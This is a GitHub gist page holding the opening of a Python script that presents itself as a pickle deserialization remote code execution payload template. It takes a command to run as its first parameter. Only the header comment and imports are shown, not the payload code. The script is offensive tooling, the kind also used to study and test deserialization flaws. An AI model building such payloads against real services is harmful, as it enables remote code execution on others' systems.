Skip to content

Instantly share code, notes, and snippets.

View MuMuuuu's full-sized avatar
🇫🇰
MuMu, remember M are uppercase

MuMu MuMuuuu

🇫🇰
MuMu, remember M are uppercase
View GitHub Profile
@MuMuuuu
MuMuuuu / pickle-payload.py
Created November 9, 2022 15:18 — forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64